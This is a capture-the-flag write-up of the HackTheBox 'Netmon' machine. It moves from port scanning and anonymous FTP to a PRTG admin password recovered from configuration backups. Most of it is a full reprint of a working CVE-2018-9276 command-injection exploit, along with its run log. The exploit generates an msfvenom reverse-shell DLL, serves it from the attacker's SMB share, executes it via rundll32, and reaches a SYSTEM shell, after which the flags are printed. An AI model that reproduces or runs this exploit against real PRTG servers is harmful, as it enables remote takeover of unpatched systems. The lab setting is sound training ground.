Netmon
Windows box on HTB.
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Netmon]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.190.214
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-19 21:58 +03
Nmap scan report for 10.129.190.214
Host is up, received echo-reply ttl 127 (0.28s latency).
Scanned at 2025-09-19 21:58:13 +03 for 228s
Not shown: 65403 closed tcp ports (reset), 119 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_11-10-23 10:20AM <DIR> Windows
80/tcp open http syn-ack ttl 127 Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
|_http-server-header: PRTG/18.1.37.13946
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
<snipped>
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHTTP (80):
FTP (22):
Since we have ftp anonymous access, we need to find any config files, or database files, that could contain username and encrypted passwords.
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Netmon/ftp]
└─$ ftp anonymous@10.129.190.214
Connected to 10.129.190.214.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50027|)
125 Data connection already open; Transfer starting.
02-03-19 12:18AM 1024 .rnd
02-25-19 10:15PM <DIR> inetpub
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
02-03-19 08:08AM <DIR> Users
11-10-23 10:20AM <DIR> Windows
226 Transfer complete.
ftp> cd ProgramData
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50028|)
125 Data connection already open; Transfer starting.
12-15-21 10:40AM <DIR> Corefig
02-03-19 12:15AM <DIR> Licenses
11-20-16 10:36PM <DIR> Microsoft
02-03-19 12:18AM <DIR> Paessler
02-03-19 08:05AM <DIR> regid.1991-06.com.microsoft
07-16-16 09:18AM <DIR> SoftwareDistribution
02-03-19 12:15AM <DIR> TEMP
11-20-16 10:19PM <DIR> USOPrivate
11-20-16 10:19PM <DIR> USOShared
02-25-19 10:56PM <DIR> VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50031|)
125 Data connection already open; Transfer starting.
09-19-25 03:07PM <DIR> PRTG Network Monitor
226 Transfer complete.
ftp> cd "PRTG Network Monitor"
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50033|)
125 Data connection already open; Transfer starting.
09-19-25 03:07PM <DIR> Configuration Auto-Backups
09-19-25 03:07PM <DIR> Log Database
02-03-19 12:18AM <DIR> Logs (Debug)
02-03-19 12:18AM <DIR> Logs (Sensors)
02-03-19 12:18AM <DIR> Logs (System)
09-19-25 03:07PM <DIR> Logs (Web Server)
09-19-25 03:07PM <DIR> Monitoring Database
02-25-19 10:54PM 1189697 PRTG Configuration.dat
02-25-19 10:54PM 1189697 PRTG Configuration.old
07-14-18 03:13AM 1153755 PRTG Configuration.old.bak
09-19-25 03:07PM 1641526 PRTG Graph Data Cache.dat
02-25-19 11:00PM <DIR> Report PDFs
02-03-19 12:18AM <DIR> System Information Database
02-03-19 12:40AM <DIR> Ticket Database
02-03-19 12:18AM <DIR> ToDo Database
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> get "PRTG Configuration.dat"
local: PRTG Configuration.dat remote: PRTG Configuration.dat
229 Entering Extended Passive Mode (|||50037|)
125 Data connection already open; Transfer starting.
100% |*******************************************************************************************************************************| 1161 KiB 329.84 KiB/s 00:00 ETA
226 Transfer complete.
1189697 bytes received in 00:03 (319.10 KiB/s)
ftp> get "PRTG Configuration.dat.old"
local: PRTG Configuration.dat.old remote: PRTG Configuration.dat.old
229 Entering Extended Passive Mode (|||50042|)
550 The system cannot find the file specified.
ftp> get "PRTG Configuration.old"
local: PRTG Configuration.old remote: PRTG Configuration.old
229 Entering Extended Passive Mode (|||50043|)
150 Opening BINARY mode data connection.
100% |*******************************************************************************************************************************| 1161 KiB 314.70 KiB/s 00:00 ETA
226 Transfer complete.
1189697 bytes received in 00:03 (305.12 KiB/s)
ftp> get "PRTG Configuration.old.bak"
local: PRTG Configuration.old.bak remote: PRTG Configuration.old.bak
229 Entering Extended Passive Mode (|||50046|)
125 Data connection already open; Transfer starting.
100% |*******************************************************************************************************************************| 1126 KiB 277.77 KiB/s 00:00 ETA
226 Transfer complete.
1153755 bytes received in 00:04 (269.27 KiB/s)
ftp> exit
221 Goodbye.┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Netmon/ftp]
└─$ cat PRTG\ Configuration.old.bak | grep -i prtgadmin -A 2 -B 2
</dbcredentials>
<dbpassword>
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>
--
</lastlogin>
<login>
prtgadmin
</login>
<name>┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Netmon/ftp]
└─$ cat PRTG\ Configuration.old.bak | grep -i password -A 5 -B 5
0
</dbauth>
<dbcredentials>
0
</dbcredentials>
<dbpassword>
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>
<dbtimeout>
60
</dbtimeout>
<depdelay>
0
<snipped>
Exploitation:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Netmon]
└─$ searchsploit PRTG Network Monitor 18
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution | windows/webapps/46527.sh
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service) | windows_x86/dos/44500.py
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Netmon]
└─$ git clone https://github.com/A1vinSmith/CVE-2018-9276.git
Cloning into 'CVE-2018-9276'...
remote: Enumerating objects: 61, done.
remote: Counting objects: 100% (61/61), done.
remote: Compressing objects: 100% (61/61), done.
remote: Total 61 (delta 19), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (61/61), 20.57 KiB | 1.29 MiB/s, done.
Resolving deltas: 100% (19/19), done../exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass#!/usr/bin/python3
#####################################################################################
#
# Title: PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell)
# Reference: CVE-2018-9276
# https://nvd.nist.gov/vuln/detail/CVE-2018-9276
# Author: Alvin Smith
# Date: 29/07/2021
# Description: Re-write of exploit released by wildkindcc (https://github.com/wildkindcc/CVE-2018-9276)
# Python3 support
#
#####################################################################################
import colorama
import argparse
import http.client, urllib.request, urllib.parse, urllib.error
import traceback
import ssl
import random
import string
import json
import sys
import time
import os
from impacket.examples import logger
from impacket import smbserver, version
from impacket.ntlm import compute_lmhash, compute_nthash
import threading
import logging
import socket
#####################################################################################
# Adds colourised notifications to text
# Colourama is not neccesary for ANSI compliant terminals; however, it will make it work in windows.
colorama.init()
error = '\033[31m[!] \033[0m' # [!] Red
fail = '\033[31m[-] \033[0m' # [-] Red
success = '\033[32m[+] \033[0m' # [+] Green
event = '\033[34m[*] \033[0m' # [*] Blue
debug = '\033[35m[%] \033[0m' # [%] Magenta
notification = '[-] ' # [-]
#####################################################################################
# argparse
# https://docs.python.org/3.3/library/argparse.html#module-argparse
def get_args():
# This function parses and return arguments passed in
# Help (-h --help) is automagically defined.
# Assign description to the help doc
parser = argparse.ArgumentParser(
description='CVE-2018-9276')
# Add arguments
parser.add_argument(
'-i', '--host', type=str, help='IP address / Hostname of vulnerable PRTG server', required=True)
parser.add_argument(
'-p', '--port', type=str, help='Port number', required=True)
parser.add_argument(
'--lhost', type=str, help='LHOST for MSFVENOM', required=True)
parser.add_argument(
'--lport', type=str, help='LPORT for MSFVENOM', required=True)
parser.add_argument(
'--user', type=str, help='Administrator Username', required=False, default="prtgadmin")
parser.add_argument(
'--password', type=str, help='Administrator Password', required=False, default="prtgadmin")
parser.add_argument(
'--https', action='store_true', help='Negotiate SSL connection to the server (Requires socket to be compiled with SSL support)', required=False, default=None)
# Array for all arguments passed to script
args = parser.parse_args()
# Assign args to variables
host = args.host
port = args.port
lhost = args.lhost
lport = args.lport
user = args.user
password = args.password
https = args.https
# Return all variable values
return host, port, lhost, lport, user, password, https
#####################################################################################
host, port, lhost, lport, user, password, https = get_args()
url = "%s:%s" % (host, port)
def checkVersion():
# Check for SSL
if https:
conn = http.client.HTTPSConnection(url, context=ssl._create_unverified_context())
else:
conn = http.client.HTTPConnection(url)
conn.request("GET", "/")
response = conn.getresponse()
version = response.getheader('Server')
conn.close()
versionSplit = []
vulnerable = True
for var in version.split("/")[1].split(".")[:3]:
versionSplit.append(var)
if not int(versionSplit[0]) <= 18:
print(versionSplit[0])
vulnerable = False
if not int(versionSplit[1]) <= 2:
print(versionSplit[1])
vulnerable = False
if not int(versionSplit[2]) < 39:
print(versionSplit[2])
vulnerable = False
if not vulnerable:
raise ValueError('Server returned version [{}]'.format(version), "Versions < 18.2.39 are vulnerable to CVE-2018-9276")
else:
print(success + "[{}] is Vulnerable!".format(version))
return 0
def randomString(stringLength=8):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
# Connects to the PRTG server instance and retrieves a valid session cookie.
def get_session():
headers = {
'Content-Type' : 'application/x-www-form-urlencoded'
}
payload = "loginurl=%2Fmyaccount.htm%3Ftabid%3D2&username={}&password={}".format(user, password)
# Check for SSL
if https:
conn = http.client.HTTPSConnection(url, context=ssl._create_unverified_context())
else:
conn = http.client.HTTPConnection(url)
conn.request("POST", "/public/checklogin.htm", payload, headers)
response = conn.getresponse()
header = response.getheader('set-cookie')
conn.close()
if not header:
raise ValueError('Session not obtained. Check your usename/password and try again!')
else:
print(success + "Session obtained for [{}:{}]".format(user, password))
session = header.split(";")[0]
return session
def createFile(fileLocation):
# Prepare the environment by creating an output file required for injection
session = get_session()
name = randomString()
headers = {
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With' : 'XMLHttpRequest',
'Cookie' : str(session)
}
payload = "name_={}&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.bat&message_10=\"{}\"&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2".format(name, urllib.parse.quote_plus(fileLocation))
# Check for SSL
if https:
conn = http.client.HTTPSConnection(url, context=ssl._create_unverified_context())
else:
conn = http.client.HTTPConnection(url)
conn.request("POST", "/editsettings", payload, headers)
response = conn.getresponse()
objid = json.loads(response.read())['objid']
conn.close()
print(success + "File staged at [{}] successfully with objid of [{}]".format(fileLocation, objid))
return objid
def prepareCommand(fileLocation, command):
session = get_session()
# File: log output which we require for injection
# Session: A valid session ID returned from get_session
name = randomString()
headers = {
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With' : 'XMLHttpRequest',
'Cookie' : str(session)
}
payload = "name_={}&tags_=&active_=1&schedule_=-1%7CNone%7C&postpone_=1&comments=&summode_=2&summarysubject_=%5B%25sitename%5D+%25summarycount+Summarized+Notifications&summinutes_=1&accessrights_=1&accessrights_=1&accessrights_201=0&active_1=0&addressuserid_1=-1&addressgroupid_1=-1&address_1=&subject_1=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&contenttype_1=text%2Fhtml&customtext_1=&priority_1=0&active_17=0&addressuserid_17=-1&addressgroupid_17=-1&message_17=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_8=0&addressuserid_8=-1&addressgroupid_8=-1&address_8=&message_8=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_2=0&eventlogfile_2=application&sender_2=PRTG+Network+Monitor&eventtype_2=error&message_2=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_13=0&sysloghost_13=&syslogport_13=514&syslogfacility_13=1&syslogencoding_13=1&message_13=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_14=0&snmphost_14=&snmpport_14=162&snmpcommunity_14=&snmptrapspec_14=0&messageid_14=0&message_14=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&senderip_14=&active_9=0&url_9=&urlsniselect_9=0&urlsniname_9=&postdata_9=&active_10=0&active_10=10&address_10=Demo+EXE+Notification+-+OutFile.ps1&message_10=\"{};{}\"&windowslogindomain_10=&windowsloginusername_10=&windowsloginpassword_10=&timeout_10=60&active_15=0&accesskeyid_15=&secretaccesskeyid_15=&arn_15=&subject_15=&message_15=%5B%25sitename%5D+%25device+%25name+%25status+%25down+(%25message)&active_16=0&isusergroup_16=1&addressgroupid_16=200%7CPRTG+Administrators&ticketuserid_16=100%7CPRTG+System+Administrator&subject_16=%25device+%25name+%25status+%25down+(%25message)&message_16=Sensor%3A+%25name%0D%0AStatus%3A+%25status+%25down%0D%0A%0D%0ADate%2FTime%3A+%25datetime+(%25timezone)%0D%0ALast+Result%3A+%25lastvalue%0D%0ALast+Message%3A+%25message%0D%0A%0D%0AProbe%3A+%25probe%0D%0AGroup%3A+%25group%0D%0ADevice%3A+%25device+(%25host)%0D%0A%0D%0ALast+Scan%3A+%25lastcheck%0D%0ALast+Up%3A+%25lastup%0D%0ALast+Down%3A+%25lastdown%0D%0AUptime%3A+%25uptime%0D%0ADowntime%3A+%25downtime%0D%0ACumulated+since%3A+%25cumsince%0D%0ALocation%3A+%25location%0D%0A%0D%0A&autoclose_16=1&objecttype=notification&id=new&targeturl=%2Fmyaccount.htm%3Ftabid%3D2".format(name, urllib.parse.quote_plus(fileLocation), urllib.parse.quote_plus(command))
# Check for SSL
if https:
conn = http.client.HTTPSConnection(url, context=ssl._create_unverified_context())
else:
conn = http.client.HTTPConnection(url)
conn.request("POST", "/editsettings", payload, headers)
#conn.debuglevel = 1
response = conn.getresponse()
#print response.status, response.reason
objid = json.loads(response.read())['objid']
conn.close()
print(success + "Command staged at [{}] successfully with objid of [{}]".format(fileLocation, objid))
return objid
def notify(objid):
session = get_session()
headers = {
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With' : 'XMLHttpRequest',
'Cookie' : str(session)
}
payload = "id={}".format(objid)
# Check for SSL
if https:
conn = http.client.HTTPSConnection(url, context=ssl._create_unverified_context())
else:
conn = http.client.HTTPConnection(url)
conn.request("POST", "/api/notificationtest.htm", payload, headers)
response = conn.getresponse()
data = response.read()
data = data.decode('utf-8') # Decode the bytes object to string as 2to3 didn't do it
conn.close()
if 'EXE notification is queued up' not in data:
raise ValueError('Notify did not return the correct response.', data)
else:
print(success + "Notification with objid [{}] staged for execution".format(objid))
return 0
def initialise(fileLocation):
objid = createFile(fileLocation)
time.sleep(5)
notify(objid)
def executeCommand(fileLocation, command):
objid = prepareCommand(fileLocation, command)
time.sleep(5)
notify(objid)
def generatePayload(output, lhost, lport):
print(event + "Generate msfvenom payload with [LHOST={} LPORT={} OUTPUT={}]".format(lhost, lport, output))
os.system("msfvenom -p windows/shell_reverse_tcp LHOST="+ lhost + " LPORT="+ lport +" -f dll > " + output)
def hostPayload(lhost, outputDir, shareName):
server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
server.addShare(shareName, outputDir)
# If the host you're talking to doesnt support SMBv1 this can be uncommented to enable it. This is an experimental impacket feature.
# server.setSMB2Support(True)
server.setSMBChallenge('')
print(event + "Hosting payload at [\\\\{}\{}]".format(lhost, shareName))
server.start()
# I commented out to avoid log error "Unknown level for query path info"
# https://github.com/SecureAuthCorp/impacket/blob/master/impacket/smbserver.py
'''
time.sleep(5)
server.stop()
'''
#####################################################################################
logging.basicConfig(level=logging.DEBUG, format=event + '%(message)s',)
# Simple error handling because
try:
# Default writable file location
fileLocation = 'C:\\Users\\Public\\tester.txt'
checkVersion()
print("")
print(event + "Exploiting [%s:%s] as [%s/%s]" % (host, port, user, password))
shellName = randomString()
shareName = randomString().upper()
outputDir = "/tmp"
payload = "{}/{}.dll".format(outputDir,shellName)
shellLocation = "\\\\{}\\{}\\{}.dll".format(lhost, shareName, shellName)
initialise(fileLocation)
# Generate our reverse shell payload
generatePayload(payload, lhost, lport)
# Setup the threading to run an impacket server in the background
impacket = threading.Timer(0, hostPayload, args=(lhost, outputDir, shareName,))
impacket.setName('Impacket')
impacket.setDaemon(True)
impacket.start()
# Little sleep just to make sure everything is dandy
time.sleep(2)
command = "rundll32.exe " + shellLocation + ",0"
executeCommand(fileLocation, command)
# Close the SMB server when no longer required
print(event + "Attempting to kill the impacket thread")
print(notification + "Impacket will maintain its own thread for active connections, so you may find it's still listening on <LHOST>:445!")
print(notification + "ps aux | grep <script name> and kill -9 <pid> if it is still running :)")
print(notification + "The connection will eventually time out.")
impacket.cancel()
print("")
print(success + "Listening on [{}:{} for the reverse shell!]".format(lhost, lport))
os.system("nc -nvlp " + lport)
except ValueError as err:
for errors in err:
print(error + errors)
traceback.print_exc()
except Exception:
print(error + "An unhandled exception has occured!")
traceback.print_exc()┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Netmon/CVE-2018-9276]
└─$ python3 exploit.py -i 10.129.190.214 -p 80 --lhost 10.10.16.43 --lport 443 --user prtgadmin --password 'PrTg@dmin2019'
/home/kali/Desktop/CTF/Machines/HackTheBox/Netmon/CVE-2018-9276/exploit.py:259: SyntaxWarning: invalid escape sequence '\{'
print(event + "Hosting payload at [\\\\{}\{}]".format(lhost, shareName))
[+] [PRTG/18.1.37.13946] is Vulnerable!
[*] Exploiting [10.129.190.214:80] as [prtgadmin/PrTg@dmin2019]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] File staged at [C:\Users\Public\tester.txt] successfully with objid of [2018]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Notification with objid [2018] staged for execution
[*] Generate msfvenom payload with [LHOST=10.10.16.43 LPORT=443 OUTPUT=/tmp/xtkjnbyy.dll]
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
/home/kali/Desktop/CTF/Machines/HackTheBox/Netmon/CVE-2018-9276/exploit.py:294: DeprecationWarning: setName() is deprecated, set the name attribute instead
impacket.setName('Impacket')
/home/kali/Desktop/CTF/Machines/HackTheBox/Netmon/CVE-2018-9276/exploit.py:295: DeprecationWarning: setDaemon() is deprecated, set the daemon attribute instead
impacket.setDaemon(True)
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Hosting payload at [\\10.10.16.43\SCOWTFJM]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Command staged at [C:\Users\Public\tester.txt] successfully with objid of [2019]
[+] Session obtained for [prtgadmin:PrTg@dmin2019]
[+] Notification with objid [2019] staged for execution
[*] Attempting to kill the impacket thread
[-] Impacket will maintain its own thread for active connections, so you may find it's still listening on <LHOST>:445!
[-] ps aux | grep <script name> and kill -9 <pid> if it is still running :)
[-] The connection will eventually time out.
[+] Listening on [10.10.16.43:443 for the reverse shell!]
listening on [any] 443 ...
[*] Incoming connection (10.129.190.214,50328)
[*] AUTHENTICATE_MESSAGE (\,NETMON)
[*] User NETMON\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
connect to [10.10.16.43] from (UNKNOWN) [10.129.190.214] 50331Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
[*] Disconnecting Share(1:IPC$)
whoami
nt authority\system
C:\Windows\system32>hostname
netmon
C:\Windows\system32>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::385f:3c24:ed5a:98c5
Link-local IPv6 Address . . . . . : fe80::385f:3c24:ed5a:98c5%3
IPv4 Address. . . . . . . . . . . : 10.129.190.214
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%3
10.129.0.1
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htbC:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
b8fee113ab436d6473a94324ae781b99
C:\Windows\system32>type C:\Users\Public\Desktop\user.txt
dd231602d6d27ed42fe45d4421ce79edLast updated